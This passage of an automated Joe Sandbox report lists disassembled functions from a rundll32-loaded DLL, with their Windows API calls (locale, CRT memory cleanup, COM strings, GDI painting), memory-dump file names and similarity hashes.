Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,615D5E92,00000000,00000000,?), ref: 615D6043

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort
String ID:
API String ID: 2070445861-0
Opcode ID: 70b5c990f374a82a3270929f505f58f53d716e73abb227fe65e9465f916aa85a
Instruction ID: 1f158c01f74bea4ad24387917e0eb8088e16b9e87bf35b1c45ae55c71753a959
Opcode Fuzzy Hash: 70b5c990f374a82a3270929f505f58f53d716e73abb227fe65e9465f916aa85a
Instruction Fuzzy Hash: C2F04932D00216ABEB149AE88809BBEBB78EB40714F01C468DC15A3140EE74FD42C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 615D597B, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

Part of subcall function 615CA294: _free.LIBCMT ref: 615CA2EF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,615CB726,00000000,615CB846), ref: 615D59CF

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 5eb5d82ddcdcb2d70f4a8913f2191f89c9af85ab7cb4822c526d53611a8170d1
Instruction ID: e80f4eeb285b9ef90a967ecb159d1e31e7c2af25694e480c6a924b40c81265a7
Opcode Fuzzy Hash: 5eb5d82ddcdcb2d70f4a8913f2191f89c9af85ab7cb4822c526d53611a8170d1
Instruction Fuzzy Hash: F3F0F932A511159BC7149F78DC449BAB3E8DB86721F0181BAA906D7340EB785D048794

Uniqueness

Uniqueness Score: -1.00%

Function 615D5B0A, Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

EnumSystemLocalesW.KERNEL32(615D5DE7,00000001,FFFFFFFF,?,615CB71F,?,615D6188,615CB71F,?,?,?,?,?,615CB71F,?,?), ref: 615D5B56

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: d0fb200b419a902643bb9edc72cb9c10ef910cb68b41f7d7ff65f4bb992a5edb
Instruction ID: 85cc3f157f95a3db2b96763222865a661c32166f6d64991c36f4e143d6b11975
Opcode Fuzzy Hash: d0fb200b419a902643bb9edc72cb9c10ef910cb68b41f7d7ff65f4bb992a5edb
Instruction Fuzzy Hash: 08F022326103051FEB155E798C80A6AFBB1FF81B2CB05C42CE9428B640E6719802CB58

Uniqueness

Uniqueness Score: -1.00%

Function 615CDD93, Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 615C7625: EnterCriticalSection.KERNEL32(-615F0F0D,?,615CE708,?,615ED460,0000000C), ref: 615C7634

EnumSystemLocalesW.KERNEL32(615CDD86,00000001,615ED420,0000000C), ref: 615CDDCB

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 232f43e6586805dc95b546b30d613d9449672dd6cbe18d32bae001dd03f9aa7c
Instruction ID: f59ce3cad8720b64ff188ee81907b79b459cbd05835be0994c984310a43c2619
Opcode Fuzzy Hash: 232f43e6586805dc95b546b30d613d9449672dd6cbe18d32bae001dd03f9aa7c
Instruction Fuzzy Hash: E6F04976A202059FDB10DFA8D845B5DBBF1FB86724F02855AF425DB290DB758A80CF81

Uniqueness

Uniqueness Score: -1.00%

Function 615D5A24, Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 615CA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,615BED16,615ED0A0,0000000C,00000004,00000001,00000004,?,615A4865,00000000,00000000), ref: 615CA298
Part of subcall function 615CA294: SetLastError.KERNEL32(00000000,00000006,000000FF,?,615A4865,00000000,00000000), ref: 615CA33C
Part of subcall function 615CA294: _abort.LIBCMT ref: 615CA342

EnumSystemLocalesW.KERNEL32(615D597B,00000001,FFFFFFFF,?,?,615D61E6,615CB71F,?,?,?,?,?,615CB71F,?,?,?), ref: 615D5A5B

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: dbd835c187ed93775758314db45489b9ebd3a896dc28698e5afd16ebbc146440
Instruction ID: b809e402a52eecb86fc1e999254760031fdc2f9b8a146c84c03a7a994f17f9bf
Opcode Fuzzy Hash: dbd835c187ed93775758314db45489b9ebd3a896dc28698e5afd16ebbc146440
Instruction Fuzzy Hash: 90F05C3670021957CB059F7AC88465AFF61EFC2714B07C05DEA058B150D2719943C794

Uniqueness

Uniqueness Score: -1.00%

Function 615A8A50, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction ID: 2ff77b86139dbb94c89c355f97460625c0145eb530310b066003ee30ef8168ea
Opcode Fuzzy Hash: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction Fuzzy Hash: FF218E76B442548FDB10CF58D8D0A69FBF4FF4A221B1A41EADD49CB312D270E854DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 615A1A40, Relevance: .0, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 442cdd799ce2523841168db9e7e860569f600948ee53f043b919694f273ca13e
Instruction ID: 6a6506d355ffeca77e54bfaba183d5417fdbded24a4eec0bf632d8522efd9b96
Opcode Fuzzy Hash: 442cdd799ce2523841168db9e7e860569f600948ee53f043b919694f273ca13e
Instruction Fuzzy Hash: 2DF01235744544AFD704CF55C450B29FBE9FB09710F14826DE81AC7790DB7599008B80

Uniqueness

Uniqueness Score: -1.00%

Function 615A6510, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction ID: 414c4e9a41925208df7f1c7eb737837e20cdd7f8943b5fe648e5ee3c951bb8ec
Opcode Fuzzy Hash: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction Fuzzy Hash: EEE086326467A08FEF15CB4CF450A5CF7A0EF04B10B8248A5E850CBA19C330D8418590

Uniqueness

Uniqueness Score: -1.00%

Function 615A13F0, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2befc1eb188f7f01c2c7bf3db9af76b10d7073361dd05215cd61d8924f7506b
Instruction ID: 513b67be4edd1d986e0762750fbffddf320f0749b097b682cc1280866c81d57a
Opcode Fuzzy Hash: d2befc1eb188f7f01c2c7bf3db9af76b10d7073361dd05215cd61d8924f7506b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 615A9BA0, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 424memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 615A9CDA
VariantCopy.OLEAUT32(?,?), ref: 615A9CE8
SysFreeString.OLEAUT32(00000000), ref: 615A9D30
SysFreeString.OLEAUT32(-00000001), ref: 615A9DC2
VariantClear.OLEAUT32(?), ref: 615A9DF7
SysFreeString.OLEAUT32(-00000001), ref: 615A9E16
SysFreeString.OLEAUT32(00000000), ref: 615A9E47
SysFreeString.OLEAUT32(00000000), ref: 615A9E60
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 615A9EE4
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 615A9EEE
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 615A9F0B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 615A9F28
SysFreeString.OLEAUT32(00000000), ref: 615A9F37
SysFreeString.OLEAUT32(00000000), ref: 615A9FBB
SysFreeString.OLEAUT32(00000000), ref: 615A9FFF
_com_issue_error.COMSUPP ref: 615AA041
_com_issue_error.COMSUPP ref: 615AA04B
_com_issue_error.COMSUPP ref: 615AA051
_com_issue_error.COMSUPP ref: 615AA05B
SysFreeString.OLEAUT32(7504D5B0), ref: 615AA061

Strings

lines, xrefs: 615A9EDB, 615A9F02
offsetY, xrefs: 615A9CF6
!, xrefs: 615AA00A

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: String$Free$_com_issue_error$Variant$ByteCharMultiWide$AllocBstrClearCopyInit
String ID: !$lines$offsetY
API String ID: 2214081791-1236976741
Opcode ID: 649f7122b5629733bcb616f259548d19353650cae4998308736baf92b7b00ee2
Instruction ID: 5c28d0165c1fd8ee42ed481ce1dc55b7fff57423d8d68834e351e9191e96e713
Opcode Fuzzy Hash: 649f7122b5629733bcb616f259548d19353650cae4998308736baf92b7b00ee2
Instruction Fuzzy Hash: 1FF18E70E4025ADFEB11CFE4C844BAEFBB8AF45704F108458E525BB290DB76E945CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 615B23F0, Relevance: 31.7, APIs: 21, Instructions: 183windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 615B24A3
GetParent.USER32(?), ref: 615B24AC
GetClientRect.USER32 ref: 615B24C2
CreateCompatibleDC.GDI32(?), ref: 615B24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 615B24EA
SelectObject.GDI32(00000000,00000000), ref: 615B24F6
SelectObject.GDI32(00000000,?), ref: 615B2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 615B2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 615B252F
SetBkMode.GDI32(?,00000001), ref: 615B2538
SetTextColor.GDI32(?,00FFFFFF), ref: 615B2544
GetClientRect.USER32 ref: 615B2556
ClientToScreen.USER32(?,?), ref: 615B2564
ClientToScreen.USER32(?,?), ref: 615B2579
ClientToScreen.USER32(?,?), ref: 615B259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 615B25FD
SelectObject.GDI32(?,?), ref: 615B2608
SelectObject.GDI32(?,?), ref: 615B2613
DeleteObject.GDI32(?), ref: 615B261D
DeleteDC.GDI32(?), ref: 615B2624
EndPaint.USER32(?,?), ref: 615B2632

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 0cea388ce89939d2d8bba85e54b2a3fdf356d952f7c0194e6744802a7b570dee
Instruction ID: f25833d57b62a6d293853abb3c82822a7ead5837ee6cdee782a8056c7d95507e
Opcode Fuzzy Hash: 0cea388ce89939d2d8bba85e54b2a3fdf356d952f7c0194e6744802a7b570dee
Instruction Fuzzy Hash: D8615C71514701AFDB209F64CC08B6FBBE9FF89700F018A1DF6A5922A0DB70A945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 615B2460, Relevance: 31.6, APIs: 21, Instructions: 141windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 615B24A3
GetParent.USER32(?), ref: 615B24AC
GetClientRect.USER32 ref: 615B24C2
CreateCompatibleDC.GDI32(?), ref: 615B24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 615B24EA
SelectObject.GDI32(00000000,00000000), ref: 615B24F6
SelectObject.GDI32(00000000,?), ref: 615B2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 615B2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 615B252F
SetBkMode.GDI32(?,00000001), ref: 615B2538
SetTextColor.GDI32(?,00FFFFFF), ref: 615B2544
GetClientRect.USER32 ref: 615B2556
ClientToScreen.USER32(?,?), ref: 615B2564
ClientToScreen.USER32(?,?), ref: 615B2579
ClientToScreen.USER32(?,?), ref: 615B259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 615B25FD
SelectObject.GDI32(?,?), ref: 615B2608
SelectObject.GDI32(?,?), ref: 615B2613
DeleteObject.GDI32(?), ref: 615B261D
DeleteDC.GDI32(?), ref: 615B2624
EndPaint.USER32(?,?), ref: 615B2632

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: e41bc2fca4ee717a5b67fec347ed3f7ba98ff7608e2ebb93451232a9d7482ce1
Instruction ID: 1e364347a46329a25529baf420bb77bfd2d8d4c2165431e2ed679738237dfa73
Opcode Fuzzy Hash: e41bc2fca4ee717a5b67fec347ed3f7ba98ff7608e2ebb93451232a9d7482ce1
Instruction Fuzzy Hash: 71512B71418701AFDB209F64C908F6FBBE9FF8A700F02891DF6A592160DB31A945CF96

Uniqueness

Uniqueness Score: -1.00%

Function 615C7B6C, Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 615C7BDC
_free.LIBCMT ref: 615C7BF2
_free.LIBCMT ref: 615C7C03
_free.LIBCMT ref: 615C7C14
_free.LIBCMT ref: 615C7C2B
GetCPInfo.KERNEL32(?,?), ref: 615C7C73

Part of subcall function 615CF178: _free.LIBCMT ref: 615CF1E3

_free.LIBCMT ref: 615C7E1F
_free.LIBCMT ref: 615C7E32
_free.LIBCMT ref: 615C7E40
_free.LIBCMT ref: 615C7E4B
_free.LIBCMT ref: 615C7E8D
_free.LIBCMT ref: 615C7E95
_free.LIBCMT ref: 615C7E9D
_free.LIBCMT ref: 615C7EA5
_free.LIBCMT ref: 615C7EB3

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 33ced7f4d700ff17e11861c5bcfca9b3d5171fa26b982d38b3428ee3925a6c65
Instruction ID: d890280bb50f6adc14ffdbe96d5510e3aca88d8421a8538ddef08d4f8ec645d9
Opcode Fuzzy Hash: 33ced7f4d700ff17e11861c5bcfca9b3d5171fa26b982d38b3428ee3925a6c65
Instruction Fuzzy Hash: 00B17C72900306AEEB11CFF8C880BEEFBF5BF89B08F54846DE459A7641D77598418B61

Uniqueness

Uniqueness Score: -1.00%

Function 615AA080, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,3F3F20BC,7504D5B0,00000000), ref: 615AA124
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 615AA132
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,3F3F20BC,7504D5B0,00000000), ref: 615AA14F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 615AA170
SysFreeString.OLEAUT32(00000000), ref: 615AA17F
SysFreeString.OLEAUT32(00000000), ref: 615AA306
SysFreeString.OLEAUT32(00000000), ref: 615AA358
_com_issue_error.COMSUPP ref: 615AA366
SysFreeString.OLEAUT32(7504D5B0), ref: 615AA36C

Strings

Arial, xrefs: 615AA195
8, xrefs: 615AA22F
line, xrefs: 615AA11B, 615AA146

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr_com_issue_error
String ID: 8$Arial$line
API String ID: 4202715868-2849647811
Opcode ID: e9ed1d9b34146f17c3bbfb24c04d916bc0a2a93b0a074fccfdde9d192abded12
Instruction ID: 110e7d777831fbe4cf2a483db4bfd6d772bc976b7ea119a5960c994ce3357849
Opcode Fuzzy Hash: e9ed1d9b34146f17c3bbfb24c04d916bc0a2a93b0a074fccfdde9d192abded12
Instruction Fuzzy Hash: 08A1A130D40249DFEB10DFE4C848BAEFFB5AF85314F24815DE515AB290DBB5AA44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 615B87A0, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,615A8D25,615A8D27,00000000,00000000,3F3F20BC,?,00000000,?,Function_00019350,615ECEB8,000000FE,?,615A8D25), ref: 615B8814
__alloca_probe_16.LIBCMT ref: 615B8839
MultiByteToWideChar.KERNEL32(00000000,00000000,615A8D25,?,00000000,00000000,?,Function_00019350,615ECEB8,000000FE,?,615A8D25), ref: 615B888F
SysAllocString.OLEAUT32(00000000), ref: 615B889A
_com_issue_error.COMSUPP ref: 615B88DF
GetLastError.KERNEL32(80070057,3F3F20BC,?,00000000,?,Function_00019350,615ECEB8,000000FE,?,615A8D25), ref: 615B88E4
_com_issue_error.COMSUPP ref: 615B88F7
_com_issue_error.COMSUPP ref: 615B8901
GetLastError.KERNEL32(8007000E,00000000,?,00000000,?,Function_00019350,615ECEB8,000000FE,?,615A8D25), ref: 615B8917
_com_issue_error.COMSUPP ref: 615B892A
_com_issue_error.COMSUPP ref: 615B8934

Strings

;\[a, xrefs: 615B896F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString__alloca_probe_16
String ID: ;\[a
API String ID: 3079088546-3318329
Opcode ID: 964b25911957cd887dc97e8e88e77cddc29d9592cadda72a6ce8f9c3dcc8fe0f
Instruction ID: 18ddc37a5d4b6e0cb0cfd2ee345d1ca40ca38771721664fb7d965e075ccba93b
Opcode Fuzzy Hash: 964b25911957cd887dc97e8e88e77cddc29d9592cadda72a6ce8f9c3dcc8fe0f
Instruction Fuzzy Hash: 5B411875E0030BABDB009FA9D850B9EFBA8FF85714F14C62AF419E7240D73499409BA6

Uniqueness

Uniqueness Score: -1.00%

Function 615D2CA4, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 615D2CE8

Part of subcall function 615D44BE: _free.LIBCMT ref: 615D44DB
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D44ED
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D44FF
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D4511
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D4523
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D4535
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D4547
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D4559
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D456B
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D457D
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D458F
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D45A1
Part of subcall function 615D44BE: _free.LIBCMT ref: 615D45B3

_free.LIBCMT ref: 615D2CDD

Part of subcall function 615C9B98: HeapFree.KERNEL32(00000000,00000000,?,615C731A,000000FF,000000FF), ref: 615C9BAE
Part of subcall function 615C9B98: GetLastError.KERNEL32(615C6995,?,615C731A,000000FF,000000FF), ref: 615C9BC0

_free.LIBCMT ref: 615D2CFF
_free.LIBCMT ref: 615D2D14
_free.LIBCMT ref: 615D2D1F
_free.LIBCMT ref: 615D2D41
_free.LIBCMT ref: 615D2D54
_free.LIBCMT ref: 615D2D62
_free.LIBCMT ref: 615D2D6D
_free.LIBCMT ref: 615D2DA5
_free.LIBCMT ref: 615D2DAC
_free.LIBCMT ref: 615D2DC9
_free.LIBCMT ref: 615D2DE1

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 48e527e2238764d75b58a88e144298125114208b9cd426cd9b72048c17606373
Instruction ID: e77e7efe343ad65379f6b6574e1cd9551b516e478850ac69f708ee279e7bee31
Opcode Fuzzy Hash: 48e527e2238764d75b58a88e144298125114208b9cd426cd9b72048c17606373
Instruction Fuzzy Hash: B4318D31A08706AFFB12AEB9D804B8AF7F8BF80719F51C459E458D7150DF30AC818B65

Uniqueness

Uniqueness Score: -1.00%

Function 615D45BC, Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 615D4604
_free.LIBCMT ref: 615D4628
_free.LIBCMT ref: 615D4635
_free.LIBCMT ref: 615D465A
